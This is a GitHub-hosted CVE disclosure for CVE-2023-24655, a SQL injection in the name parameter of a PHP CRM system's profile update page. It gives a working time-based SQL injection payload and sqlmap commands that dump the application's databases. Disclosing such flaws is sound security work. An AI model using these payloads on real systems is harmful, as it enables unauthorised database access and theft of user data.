Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2023-24655/CVE-2023-24655.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
92 lines (91 sloc)
3.54 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > [Suggested description] | |
| > Simple Customer Relationship Management System v1.0 was discovered to | |
| > contain a SQL injection vulnerability via the name parameter under the | |
| > Profile Update function. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Additional Information] | |
| > Steps-To-Reproduce: | |
| > 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php | |
| > 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php | |
| > 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php | |
| > 4. Now fill out your profile form then intercept the request in the burp suite. | |
| > 5. Now send the burp suite intercepted request into the burp repeater. | |
| > Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc | |
| > 6. Now insert the payload in the name parameter. | |
| > | |
| > Content-Disposition: form-data; name="name" | |
| > | |
| > user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc | |
| > | |
| > 7. Now click on the "send" button to send the request. | |
| > 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. | |
| > 9. Now dump data by using sqlmap. | |
| > 10. Now copy the burp intercepted request and create a file crm-profile-request.txt | |
| > | |
| > 11. Now dump databases by sqlmap. | |
| > # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch | |
| > 12. Now dump all data by sqlmap. | |
| > # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vulnerability Type] | |
| > SQL Injection | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vendor of Product] | |
| > https://www.sourcecodester.com | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Product Code Base] | |
| > Simple Customer Relationship Management (CRM) System - 1.0 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Component] | |
| > http://localhost/php-scrm/profile.php | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Type] | |
| > Remote | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Code execution] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Escalation of Privileges] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Information Disclosure] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Vectors] | |
| > SQL injection is a type of cyber attack in which an attacker inserts malicious code into a website's SQL statements in order to gain unauthorized access to sensitive information stored in a database. This type of attack can be used to steal sensitive information such as login credentials, personal information, and financial data. These attacks can have serious consequences, including: | |
| > | |
| > 1. Theft of sensitive data: An attacker can use SQL injection to access and steal confidential data from a database, such as passwords, financial information, or personal information. | |
| > 2. Modification of data: An attacker can use SQL injection to alter or delete data from a database, potentially causing incorrect results or system failures. | |
| > 3. Server compromise: In some cases, an attacker can use SQL injection to gain unauthorized access to the underlying operating system and take complete control of the server. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Reference] | |
| > https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html | |
| > https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Discoverer] | |
| > Yogesh Verma | |
| Use CVE-2023-24655. |